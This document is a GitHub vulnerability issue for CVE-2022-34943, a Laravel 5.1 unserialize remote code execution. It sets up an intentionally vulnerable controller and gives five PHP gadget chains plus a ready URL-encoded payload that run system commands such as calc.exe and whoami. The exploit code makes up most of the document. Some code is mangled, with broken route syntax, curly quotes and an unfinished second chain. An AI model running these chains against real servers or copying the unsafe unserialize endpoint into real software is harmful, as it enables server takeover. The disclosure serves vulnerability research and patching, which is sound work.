

CVE-2022-34943: Laravel5.1 Unserialize RCE · Issue #1 · beicheng-maker/vulns

Laravel v5.1 was discovered to contain a remote code execution (RCE) vulnerability via the component ChanceGenerator in __call.


Laravel 5.1 POP Chain 1-5

composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"
Add a controller `UsersController` at app/Http/Controllers/UsersController.php:

<?php namespace App\Http\Controllers; use Illuminate\Http\Request; class UsersController extends Controller {

/**
 * Deliberately vulnerable demo endpoint for CVE-2022-34943: the raw "cmd"
 * request parameter is handed straight to unserialize(), so any serialized
 * object graph the client sends is instantiated inside the application and
 * its magic methods run.
 *
 * Mitigation: never unserialize() request data. Use json_decode() for
 * structured input, or at minimum call
 * unserialize($s, ['allowed_classes' => false]) so no objects are created.
 *
 * @param  Request  $request
 * @return Response
 */
public function store(Request $request)
{  
    echo "Please post cmd to unserialize";

    // Untrusted input, read directly from the POST body.
    $payload\=$request\->input("cmd");

    // Injection point: attacker-controlled serialized data is deserialized
    // with no class allow-list (CWE-502).
    unserialize($payload);
    //
}

} ?>

routes/web.php
Route==post(‘/test’,[\App\Http\Controllers\UsersController==class,’store’]);

<?php use Illuminate\Support\Facades\Route; /* |--------------------------------------------------------------------------

Web Routes
Here is where you can register web routes for your application. These
routes are loaded by the RouteServiceProvider within a group which
contains the "web" middleware group. Now create something great!

*/

// Registers the demo endpoint: a POST to /test reaches UsersController::store,
// which unserialize()s the request's "cmd" parameter. This route is the entry
// point for the deserialization chains shown below.
Route==post(‘/test’,[\App\Http\Controllers\UsersController==class,’store’]);

0x01 RCE 1

<?php namespace Faker; class ChanceGenerator{ private $weight; protected $default; public function __construct(){ $this->weight=0; $this->default=’calc.exe’; } } namespace Faker; class ValidGenerator{ protected $generator; protected $validator; protected $maxRetries; public function __construct(){ $this->generator=new ChanceGenerator(); $this->validator=’system’; $this->maxRetries=1; } }

namespace Illuminate\Broadcasting; use Faker\ValidGenerator; class PendingBroadcast{ protected $events; public function __construct(){ $this->events=new ValidGenerator(); } } echo urlencode(serialize(new PendingBroadcast)); ?>

cmd=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00generator%22%3BO%3A21%3A%22Faker%5CChanceGenerator%22%3A2%3A%7Bs%3A29%3A%22%00Faker%5CChanceGenerator%00weight%22%3Bi%3A0%3Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A8%3A%22calc.exe%22%3B%7Ds%3A12%3A%22%00%2A%00validator%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A1%3B%7D%7D

0x02 RCE 2

<?php namespace Illuminate\Validation; class Validator{ public $extensions = []; public function __construct(){ $this->extensions[‘’]=’call_user_func’; } }

namespace Illuminate\Routing; use Illuminate\Validation\Validator; class PendingResourceRegistration{ protected $registrar; protected $name; protected $controller; protected $options; public function __construct(){ $this->name=’call_user_func’; $this->controller=’system’; $this->options=’whoami’; $this->registrar=new Validator; } }

RCE 3

<?php

namespace Illuminate\Auth; class RequestGuard{ protected $provider; protected $callback; protected $request; public function __construct(){ $this->callback = 'call_user_func’; $this->request = 'system’; $this->provider = 'calc.exe’; } }

namespace Illuminate\View; use Illuminate\Auth\RequestGuard; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new RequestGuard,’user’]; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?>

RCE 4

<?php namespace Faker; class DefaultGenerator{ public $default;

} namespace Carbon; class Carbon{}

namespace Faker; class Generator{ protected $formatters = []; public function __construct(){ $this->formatters[‘huahua’]=’system’; } }

namespace Carbon; use Carbon\Carbon; use Faker\DefaultGenerator; use Faker\Generator; class CarbonPeriod{ protected $current; protected $dateClass; protected $filters = []; protected $key; public function __construct(){ $this->dateClass=new DefaultGenerator; $this->dateClass->default=new DefaultGenerator; $this->dateClass->default->default=’huahua’; $this->current=new Carbon; $this->filters[][]=[new Generator,’format’]; $this->key=array(“calc.exe”); } }

namespace Illuminate\View; use Carbon\CarbonPeriod; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new CarbonPeriod,’valid’]; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?>

RCE 5

<?php namespace Faker; class DefaultGenerator{ public $default;

} namespace Prophecy\Doubler\Generator; use Faker\DefaultGenerator; class ClassCreator{ private $generator; public function __construct(){ $this->generator=new DefaultGenerator; $this->generator->default=’phpinfo();’;

}

}

namespace Carbon; class Carbon{}

namespace Prophecy\Doubler\Generator\Node; class ClassNode{}

namespace Carbon; use Faker\DefaultGenerator; use Prophecy\Doubler\Generator\ClassCreator; use Prophecy\Doubler\Generator\Node\ClassNode; class CarbonPeriod{ protected $current; protected $dateClass; protected $filters = []; protected $key; public function __construct(){ $this->dateClass=new DefaultGenerator; $this->dateClass->default=new DefaultGenerator; $this->dateClass->default->default=’huahua’; $this->current=new Carbon; $this->filters[][]=[new ClassCreator,’create’]; $this->key=new ClassNode; } }

namespace Illuminate\View; use Carbon\CarbonPeriod; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new CarbonPeriod,’valid’]; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?>
